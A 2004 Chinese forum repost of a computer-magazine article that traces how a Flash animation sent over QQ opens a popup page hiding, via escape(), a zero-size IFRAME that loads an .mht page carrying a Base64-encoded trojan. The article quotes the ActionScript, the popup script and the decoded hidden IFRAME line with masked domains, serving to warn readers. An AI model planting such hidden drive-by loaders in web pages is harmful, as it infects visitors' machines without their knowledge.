财经社区女性社区汽车社区军事社区文学社区社会社区娱乐社区游戏社区个人空间
上一主题:天骄日志(2004年1月7日) 下一主题:钳工工作流程
安全防范: 隐藏在精彩Flash动画背后的阴谋 (转)
[楼主] 作者:开心&乐乐  发表时间:2004/01/08 13:24
点击:198次


安全防范: 隐藏在精彩Flash动画背后的阴谋
 2004-1-6 10:56:00  信息源:电脑报 作者:邹通

     看到这个题目也许会有人觉得奇怪, 一个Flash能有什么阴谋?但是偏偏笔者就让一个精彩的Flash搞得心惊胆战……

     一天下午,笔者突然在QQ里收到一个消息:“我做的Flash动画,请增加我的观赏率吧!谢谢了朋友!
http://***www.xxxxx.com
/my.swf.Flash”。笔者迫不及待地打开这个Flash,刚开始播放好像打开了一个IE窗口,这在Flash里也是司空见惯了的,继续欣赏Flash……

     笔者拿出《硕思闪客精灵》(Flash分析软件)对这个Flash进行分析,准备学点经验。可除了有点Action外,其他什么资源也没检测到。

     莫非用了某种加密手段,先不管这些,看看Action里是什么内容(图1)。

图 1

     从上面的Action语句来看,该Flash一共2帧:第1帧是调用getURL来打开一个页面,第2帧是远程调用显示一个Flash文件。在此值得一提的是,《硕思闪客精灵》分析出Frame 2的Action是错误的,不应该是[getURL("http://***flash.xxxxx.com/flash/qq.swf","_level0")],而应该是[loadMovieNum("http://***flash.xxxxx.com/flash/qq.swf",0)],loadMovie才是调用外部Flash的语句。

     这个Flash故意先打开一个窗口,再调用一个外部的Flash,通过文件调用地址来看,被调用的Flash却是另一家站点的!先看看它弹出的是什么窗口,打开后发现是一个普通的图片站点,页面代码也无异常:

 <SCRIPT><BR>window.open('welcome.htm',",'width=345height=235')<BR></SCRIPT>

     弹出窗口是http://***www.xxxxx.com/welcome.htm,这页代码又会是什么?在IE中输入“view-sourcehttp://***xxxxx.xxx.com/welcome.htm”直接查看了该页面的源代码(图2)。


图 2

     页面用escape()函数加了密,肯定有大秘密!escape()是Java Script内置函数,可以将ASCII码转换成URL字符,达到隐藏页面代码的目的。不过Java Script还有一个对应的解码函数unescape(),笔者现在就让它现出原形:

  <IFRAME src="520.mht" frameBorder=0 width=0 height=0></IFRAME>

     注意:Iframe是可在一个页面内嵌显示另外一个页面的语句。

     520.mht到底是什么呢?笔者立刻用FlashGet把它下载了下来,地址是http://www.xxxxx.com/520.mht。下载完毕后,笔者用记事本打开一看,暗暗叫道“好险!”,果真是个木马页面(图3)!

图 3

     木马程序名是adsl.exe,且用Base64把adsl.exe编了码,图3中那些看不懂的代码就是被编码的EXE文件。

     制作一个木马页面是相当简单的,有一个叫做“网页木马捆绑器”的软件,就可以让任何人迅速地制造出木马页面。

     一个精彩的Flash的背后居然有这么阴险的招数,还好笔者开着杀弹出广告窗口的软件——PopUP Killer。这个木马页面刚弹出就被关闭了,所以才平安无事。 


【在线杀毒>免费查毒>下载版>】     


※※※※※※
本帖地址:http://club.xilu.com/deichun/msgview-10363-40399.html[复制地址]
上一主题:天骄日志(2004年1月7日) 下一主题:钳工工作流程
 [2楼]  作者:单纯女人  发表时间: 2004/01/08 15:13 

回复:这么好的东东

 

不让我安装。郁闷!



※※※※※※
我手写我心,我歌咏我情
我梦抒我爱,我情言我志

欢迎光临一代天骄>、若云的世界>论坛
[楼主]  [3楼]  作者:开心&乐乐  发表时间: 2004/01/08 20:00 

to:点右键,选“目标另存”——

OK了啊~!



※※※※※※
 [4楼]  作者:鹰男  发表时间: 2004/01/08 21:43 

回复:这就安装
谢谢乐乐!

※※※※※※

精彩推荐>>

  简捷回复 [点此进入编辑器回帖页]  文明上网 理性发言
 推荐到西陆名言:
签  名:
作  者:
密  码:
游客来访 
注册用户 提 交
西陆网(www.xilu.com )版权所有 点击拥有西陆免费论坛  联系西陆小精灵

0.15170383453369